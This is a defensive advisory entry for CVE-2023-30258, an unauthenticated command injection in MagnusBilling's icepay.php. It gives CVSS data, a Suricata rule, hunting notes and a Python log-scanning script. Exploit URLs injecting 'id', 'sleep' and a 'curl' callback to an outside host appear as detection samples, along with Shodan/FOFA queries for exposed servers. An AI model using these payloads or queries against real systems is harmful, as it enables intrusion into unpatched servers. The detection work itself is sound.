CVE-2023-30258
published 2023-06-23

CVE-2023-30258: Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

Priority: P1 (critical)
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: in the wild, public exploit, VulnCheck KEV, initial access
Exploited in the wild: yes
EPSS: 94.25% (99.8th percentile)

Affected (1 range)

Vendor: magnussolution
Product: magnusbilling
Version range: 6.0.0 – 7.3.0
Fixed in: not listed

Detection & IOCs (extracted from sources)

URL (PoC request): http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt
Path: /mbilling/lib/icepay/icepay.php
URL (Nuclei template, OOB check): {{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
URL (Nuclei template, time-based check): {{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};sleep%207;#
IDS rule (Emerging Threats, SID 2049247, Suricata sticky-buffer syntax):
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS MagnusBilling icepay.php democ Parameter Command Inject Attempt (CVE-2023-30258)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/mbilling/lib/icepay/icepay.php?democ|3d|"; fast_pattern; startswith; content:"|3b|"; within:100; content:"|3b 23|"; within:500; reference:url,attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258; reference:cve,2023-30258; classtype:attempted-admin; sid:2049247; rev:2; metadata:affected_product Linux, attack_target Networking_Equipment, created_at 2023_11_16, cve CVE_2023_30258, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_08, reviewed_at 2024_10_02; target:dest_ip;)
  • The vulnerable parameter is `democ` in a GET request to `/mbilling/lib/icepay/icepay.php`. Its value is passed unsanitised to PHP's `exec()`. Injection is indicated by a semicolon (`;`, URL-encoded `%3b`) in the parameter value, typically followed by `#` (`%23`) to comment out whatever the script appends after the injected command.
  • Exploitation requires no authentication. Look for GET requests to `icepay.php` that carry no session cookie and are not preceded by a login flow, with shell metacharacters (`;`, `|`, `&`, backticks, `$(`) in the `democ` parameter.
  • Commands execute as the web server process user. Post-exploitation artefacts to hunt for include files written to `/tmp/` (e.g. `/tmp/injected.txt`) and `curl` or `sleep` child processes spawned by the web server process.
  • For OOB/blind detection, monitor for DNS/HTTP callbacks from the MagnusBilling server to external hosts triggered by injected `curl` commands. The Nuclei template confirms exploitation by checking for `User-Agent: curl` in the interactsh callback request.
  • Shodan/FOFA fingerprinting: exposed MagnusBilling instances can be identified with `http.html:"magnusbilling"` (Shodan) or `body="magnusbilling"` (FOFA) to scope detection to relevant assets.
  • The Emerging Threats rule (SID 2049247) uses byte-pattern matching on the normalized `http.uri` buffer: the URI must start with `/mbilling/lib/icepay/icepay.php?democ=` (`|3d|` is `=`), contain `;` (`|3b|`) within 100 bytes after that prefix, and contain `;#` (`|3b 23|`) within 500 bytes after that `;`. Because `http.uri` is the normalized (percent-decoded) URI, requests that encode the separators as `%3b` and `%23` are still matched. Caveat: the rule requires the literal `;#` terminator, so a request in the style of the first PoC URL above (`democ=testfile; id > /tmp/injected.txt`, no trailing `#`) does not trigger it; pair the rule with a broader metacharacter check on the `democ` value.
  • Both MagnusBilling 6.x (all versions) and 7.x up to (but not including) the commit that fixes the vulnerability are affected. Version 7.x instances patched with commit `7af21ed620` are not vulnerable.
  • The vulnerable file is demonstration/PoC code (`lib/icepay/icepay.php`) that should not be present in production deployments. Its presence on an internet-facing server is itself a misconfiguration risk independent of patching.
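The two heuristics above (the byte-pattern logic of ET SID 2049247, and a broader check for shell metacharacters in the `democ` value) applied to web-server access logs, as an added example; this is not code from the advisory, the rule authors or the MagnusBilling project. It assumes Apache/nginx combined log format and approximates Suricata's normalized `http.uri` buffer by percent-decoding the request URI. The log lines are constructed samples, not captured traffic.

```python
"""Hunt for CVE-2023-30258 exploitation attempts in access logs (added example)."""
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample log lines (combined log format), not real traffic.
# Lines 1-2 mimic the Nuclei-style requests (";curl ...;#" and ";sleep 7;#"),
# line 3 is a benign use of the parameter, line 4 is an unrelated page,
# line 5 mimics the "testfile; id > /tmp/injected.txt" PoC with no trailing '#'.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Nov/2023:10:01:02 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=abcd;curl%20http://198.51.100.9/x;%23 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Nov/2023:10:01:05 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=abcd%3Bsleep%207%3B%23 HTTP/1.1" 200 12 "-" "python-requests/2.31"
198.51.100.2 - - [16/Nov/2023:10:02:00 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=testfile HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.2 - - [16/Nov/2023:10:02:30 +0000] "GET /mbilling/index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Nov/2023:10:03:00 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=testfile;%20id%20>%20/tmp/injected.txt HTTP/1.1" 200 12 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d+)'
)
ICEPAY_PATH = "/mbilling/lib/icepay/icepay.php"
RULE_PREFIX = ICEPAY_PATH + "?democ="
# Shell metacharacters that have no business in a file/demo name.
SHELL_META = re.compile(r"[;|&`$<>\n]")


def matches_et_rule(method, norm_uri):
    """Re-implements the content matching of ET SID 2049247.

    GET, URI starts with the democ prefix, ';' within 100 bytes after the
    prefix, then ';#' within 500 bytes after that ';'. norm_uri must already
    be percent-decoded, as Suricata's http.uri buffer is.
    """
    if method != "GET" or not norm_uri.startswith(RULE_PREFIX):
        return False
    start = len(RULE_PREFIX)
    semi = norm_uri.find(";", start, start + 100)
    if semi == -1:
        return False
    return norm_uri.find(";#", semi + 1, semi + 1 + 500) != -1


def query_params(raw_query):
    """Minimal query parser: splits on '&' only, so ';' stays inside values."""
    params = {}
    for pair in raw_query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def hunt(log_text):
    """Return one finding per suspicious icepay.php request, with the reasons."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        method, raw_uri = m["method"], m["uri"]
        raw_path, _, raw_query = raw_uri.partition("?")
        if raw_path != ICEPAY_PATH:
            continue
        reasons = []
        if matches_et_rule(method, unquote(raw_uri)):
            reasons.append("et-sid-2049247")
        if any(SHELL_META.search(v) for v in query_params(raw_query).get("democ", [])):
            reasons.append("shell-metachar-in-democ")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "uri": raw_uri, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f["ip"], f["ts"], ",".join(f["reasons"]), f["uri"])
```

Run against the samples, the two Nuclei-style requests match both checks, the benign `democ=testfile` request and the unrelated page produce nothing, and the `id > /tmp/injected.txt` request is caught only by the metacharacter check, since it lacks the `;#` terminator the ET rule requires. The path comparison is exact, so variants such as a doubled slash in the path would need the normalization your log pipeline applies before this runs.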

CVSS provenance

NVD: CVSS v3.1 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
VulnCheck: 9.8 CRITICAL